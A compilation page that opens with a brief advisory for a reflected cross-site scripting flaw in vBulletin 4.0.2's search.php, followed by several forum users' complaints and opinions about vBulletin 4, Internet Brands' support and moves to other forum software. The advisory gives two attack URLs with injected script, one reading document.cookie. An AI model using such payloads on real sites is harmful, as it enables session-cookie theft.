Cross Site Scripting Vulnerability for Internet Brands vBulletin 4.0.2 Patch Level 1

Vendor: Internet Brands (Nasdaq: INET)
Software: vBulletin
Version: 4.0.2 Patch Level 1
Type: Cross Site Scripting

[+] Discovered By: 5ubzer0
[+] My id : http://inj3ct0r.com/author/2307
[+] Original : http://inj3ct0r.com/exploits/9697
# Version: Vbulletin 4.0.2

www.site.com/path/search.php?search_type=1&contenttype=vBBlog_BlogEntry&query=">
<script>alert('xss');</script>
www.site.com/path/search.php?search_type=1&contenttype=vBBlog_BlogEntry&query=">
<script>alert(document.cookie);</script>

Marmite. – by Carnage-

You either love it or hate it, right?

It seems that the same can be said for vbulletin 4 and its starting to bug me. On one side you’ve got dozens of threads proclaiming “upgrading to vb4 was the worst mistake i’ve ever made” and “why i ditched vb4” etc. On the other side, you’ve got a handful of people who are defending Ib/vbulletin to greater or lesser extents; some to almost religious proportions. I want to have my say, a more realistic view on vb4 without it getting burried in another ‘omg vb4 sucks’ type thread.

1. vBulletin 4 has bugs; probably more than any released vbulletin version in the past however this is probably due in part to far greater scruitiny of the code, the bug tracker is more active so more stuff is being reported. The other major cause is the fact that vbulletin 4 was rushed out, this was almost certainally done for ‘shareholder’ reasons and I feel it was a shame that this happened. If I were a shareholder, I’d be far more interested in keeping the reputation of the brand up instead of making a quick buck in the short term.

2. Stylevars. Probably one of the biggest causes of complaints. I agree that the system is totally useless, however one of my admins described it thus: ‘Its not ****, its just extreamly verbose.’ I agree with this fully; As a coder, I’ve dug into the style vars system the concept is great, the implemntation is well… lacking. I could go into how and why but thats a tl;dr in and of itself.

3. vB4 itself. A lot of people are ‘holding off on upgrades till its better’ I’ve seen complaints that traffic has dropped on sites that have upgraded already. I upgraded my boards a couple of weeks ago and have seen no sigificant changes in traffic, positive or negative. The only complaints i’ve had from my members is the fact that most of the skins have not yet been converted to vb4. As far as the forum goes, there were a couple of minor issues, nothing site killing mostly style related.

Myself, I’m pleased with vbulletin 4 the upgrade has given a breath of life into a few areas of the forums and I’m hoping that activity will pick up more significantly in the coming weeks after I’ve launched the CMS. The new framework looks promising from a development point of view; I’ve already put together the begginings of my own webcomic content type and written some widgets. For the longer term i’ve sketched out plans for a store mod. The framework needs work, but its almost certainally going to be good to work with once the kinks are worked out.

I think what i’m trying to say here is that there are too many people saying vb4 is a disaster and not enough people giving a realistic view – it works for me, its not spectacular but it does its job.

My last day as an Internet Brands’s “licensed customer”. by texterted

I’m sad to go, in a way, as I loved the old regime and was happy with the 3x series and really looking forward to the 4x series.

I moved my site across to IPS last July after the “leak” fiasco. They gave me a free conversion to their platform and my user base and myself as admin, quickly adapted without much trouble and sulking.

Since then I have started another two forums both running on IPS software. So things are looking positive, which is nice.

I could only voice my discontent, at the direction that IB was taking us, with my feet and my wallet. I did this and went elsewhere for my forum solutions. I still don’t understand the business mind that IB has and why it should seem to actively want to reduce its existing customer base. I don’t really care now as I feel they are as worthless as my “owned” vB license is.

I’d like to thank some of you fellows and some of the staff for helping me with issues when I needed you.

You – the users are what really helped to make vB what it is, it’s a shame that those in charge just can’t see that.

Good luck to everyone and thanks again.

Cheers
Ted (texterted)

Internet Brands’ Customer Service Failings by nathant

So annoyed right now. I seldom rant like this but I have NEVER had as bad customer service as I have from vbulletin.

We ponied up the $285 to get the support as well as the CMS. Vbulletin came highly recommended and although I prefer open source software, we spent the money on vbulletin.

After 2 separate installs, I can’t get the visual editor to work. All I get is a bunch of placeholder text.

I emailed vbulletin support from the member’s area – after confirming my license, and all I got back was a message saying I had to get an authentication code.

I replied with the code I thought they wanted, didn’t hear anything.

Wrote back a week later. No response.

Waited another week, wrote again. Nothing.

I’ve contacted vbulletin SEVEN times to get the answer to a SIMPLE QUESTION that most likely could be answered in a few minutes, but they’re more concerned with making customers who have PAID for their software jump through their hoops to make sure that it’s not pirated.

Would I contact the company directly and draw attention to myself if I hadn’t paid?

I’ve spent a MONTH with content management system that looks awful, and makes our 9-warehouse operation look like a joke.

I’ve put in a call to the head of support at vbulletin, and no doubt I’m not going to hear back.

I don’t care if it’s your email filtering system. I don’t care if it’s your ticket support system. I don’t care if it’s the authentication code. I sent SEVEN EMAILS. Over a MONTH. On the only other reply I got, the answer was that I needed to go to your page to get an authentication code. Your page was down. And I emailed and mentioned that, so I couldn’t get that code. And I still didn’t get a reply.

You’re running a business. I PAID for a service, namely support. PROVIDE IT. I don’t care how big your company is or how you do things. Taking money for a service and not providing it is still called fraud.

I don’t care how popular your software is or how many people download it. When you offer a product – and ESPECIALLY when somebody pays more for support – you’re obligated to provide it.

Do I really have to do a credit card chargeback to get your attention? Because it’s pretty obvious that you’re not providing the service you promised.

A Customer’s Perspective of Internet Brands by Abomination

I see many many vb users in the licensed areas of Invision Power, myself included.

It appears we will make the switch to IP.Board 3.1 when it comes out also. Our forum is incompatible with the business model Internet Brands is using.

Internet Brands has a fasinating history starting out as CarsDirect.com, and I invite anyone with interest to take 10 minutes to google ‘cars direct.com wiki’ and read what comes up. I found Roger Penske’s involvement, especially when he left the board of directors particularly fascinating.

From what I can tell they are not interested in what the vb customer wants/needs at all – “they” being top management, not the support staff. Clearly there are people in the company that are passionate about vb and the customers well being.

From my perspective, IB revenue from vb is dwarfed from other income they receive, although I’ve not seen any hard numbers of Autodata vs vb for the licensing revenue. I do wonder however if the companies that pay to advertise on IB forums know where their ads are showing up, at least at one point they were being shown on a motorcycle forum which was 98% spam from Nike shoes, womans purses, and viagra ads.

The only remaining question which I continue to ask myself: Is IB purposly driving customers away so their network of sites are some of the few remaining using vb (and by that time it will be a superior product)? Or do they simply not care.

And my only remaining concern is: what will happen to the vb support staff after progressively fewer sites are using vb, and with the reduced revenue vb brings in. IB is a business. Hopefully they will be offered new positions in other parts of the company.

What Internet Brands needs to do to fix vBulletin – by Off-Topic

If IB were able to get Kier back to developing vBulletin in his original role and a couple of the others, let’s say… out with the new, in with the old it would restore a lot of peoples faith. I am not saying current developers suck (I feel quite sorry for them), though the management decisions do. I’d love to see the old vBulletin team back together, they might not fix this mess over night but I dare say a lot of customers would stick around for their fix up rather than IBs. (Hence some going to IPB). I am on a fine line myself, the whole customization of themes is getting on my nerves more and more, slowly.

I am not a “theme” developer, yes I build websites but I don’t sell themes. vB 3 was easily customizable, vB4 is not. And I am having more and more doubts that StyleVars (even as a complete system) would make things any better. I personally think StyleVars was a very sensitive thing to put in or not. Converting the template to all CSS is one thing, but I think they should have only done that and kept the old system. Not a complete overhaul at once given IB have said VB4 comes in installments anyway. StyleVars being incomplete/buggy/etc = kills all development. Having to redevelop it, while it might prove successful runs the chance of throwing everyone off, again.

I Moved to Invision Power Board – by JaimieinNH

Sadly i joined the ranks of those that bought into the hype and found it less that desirable so I have moved to IPB.

Is it perfect? No.
Do they listen to their customers? Yes.
Will they make mistakes? Yes.
Is their product better than vB? Depends on what you’re really looking for/at.

For me, I came to vB because it was known to be the best.. using that name I bought into the vB 4.0 being bigger and better…. then came the day the site went down and their main site changed to that wonderful splash page and I was excited… and then the forums opened… sad is what I was feeling. The design, the 1st impressions was horrible.

It doesn’t take much to see that the customers here aren’t listened to unless there are a number of people screaming.. Support is lacking because of the path they (IB) have chosen and it shows.. People that have been running forums forever are having troubles with this new script and in the end I just couldn’t wait for a stable release. (stable meaning everything works and everything they said I would get was there)

So I chose to move to IPB. So far it’s been great, just looking at the pre-sales forum you will see the amount of time they spend with the community, listening, helping and communicating.. Take some time and compare pre-sales here and pre-sales there to see the difference.

For vB for become the leader again they will have to learn that the customer is always right and we have been telling you where you are going wrong for months now… it started with the leak slides and you had a chance to stop, listen and do the right thing, instead you moved forward as fast as you could and look where that’s gotten you.

Time will tell the grand affect… as we all have bought the vB 4.0 license which grants us use through the next version… it will be interesting to see what your sales are when vB 5.0 comes out.

Why we ditched vb4 – by nightbloom

Yes, we ditched vBulletin 4 and regret deeply upgrading. It wasnt the cost that made us work so hard to use it although that was a factor in us trying so hard to make it work for us. I have just always been the kind of person that goes for the best and in the past, vBulletin software was the best.

I was very disappointed in this release.

The CMS you gave us isnt a CMS at all, its like a cheap newspaper script. A lot of people would have rather seen vBulletin allow easy integration with Joomla or at least a CMS that had some functionality other than straight articles with some simple blocks down the side. VBulletin’s CMS is ugly, blocky, plain and lacks even rudimentary means of customization.

The forum is slow and uses too many queries. Members that had older computers had a hard time navigating the overly busy layout that was STOCK. While the CMS was by far the biggest disappointment for me, the forum software itself was a letdown. Skinning it to look like anything but recolored stock is a nightmare and gave it inexplicable bugs. (example: turning on “store CSS as files” would make some things work and other things error, turning it off has the same result.)

So I gave it time. Used it. Added stuff, took stuff away, tried to pare down the add ons to decrease load times but it just wasn’t working. So once again we have installed Joomla and PHPBB3 and functionality is better, looks have improved greatly and load time is down to 3 seconds.

Maybe vBulletin 4 is good for programmers or people who really understand the coding? I’m not either of those people. I just run a website for my gaming buddies and your software no longer seems made for someone like me or my visitors.

79 Days, 14 Hours, 30 Minutes Since vBulletin 4

At the time of my writing this post, it has been 79 days, 14 hours, 30 minutes since vBulletin 4 came out. It’s also been the same amount of time I’ve been using vBulletin 4 internally on my local server. It’s also been 79 days of hell.

Throughout these last 79 days, I’ve been fighting bugs, fighting with the lack of features, and last but not least, fighting the lack of functionality.

I was a skeptic to be honest when Internet Brands acquired Jelsoft. At first it seems like a great move, however I now have adequate proof Internet Brands is not the godsend they claimed to be. Looking at our 79th day since vBulletin 4 has been released, we’ve regressed.

vBulletin 4 is worse than IPB.
vBulletin 4 is worse than phpBB.
vBulletin 4 is worse than SMF.

To be blunt, vBulletin 4 just plain sucks. It does not deserve to be called the leader in community solutions. It’s lost it shine.  No longer is it “instant community”, but more to the point, instant hell and disaster.

Support is lackluster at best. Attempting to run vBulletin 4 in production mode is beyond unbearable. It’s torture. Not even tolerable.

The bugs are so bad that I would equate it with an infestation.

Note: I have the utmost respect for the current vBulletin Developers, and Project Leaders. Given the mess Joe and Bob has made, it’s a wonder itself that vBulletin 4 functions even at all.

vBulletin 4 – This is ridiculous – by Wilfred1

The simple, unedited truth.

Sorry guys but I have just got to say something about v4 and it takes a lot for me say something but I am just completely frustrated with this software now.

For the last couple of weeks I have been trying to use it and make my site presentable and every darn thing I try becomes a nightmare of effort. The simplest of things that you could do in just a couple of minutes in 3.8 takes 10 times as long – trying to figure out what css does what with some css changes being made in stylevar but that isn’t complete, some css changes in templates but then they all conflict and hard to follow – everything is just so half baked that a person has no idea what does what anymore. And, don’t get me started on these vb functions taking away php standard lines.

What you have achieved now is made vbulletin only for developers and not the bulk of your clients which are those average people that would like to set up a forum and make their changes in an easy to understand and follow system.

You may say well why upgrade? – because if I don’t I will become like one of the many average users that seem to be leaving v4 and who will end up in time completely leaving vb all together.

Why couldn’t you have just made one major change and done it properly so your customers could get use to it and understand it and then another major change in 12 months etc?

Sorry but I just had to get this off my chest because I am just so darn frustrated with not being able to do the simplest of things properly and easily within the design of the software anymore. I have a fantastic v3.8 site, I am not a developer thus one of your majority of customers, and finding it impossible to make my site v4.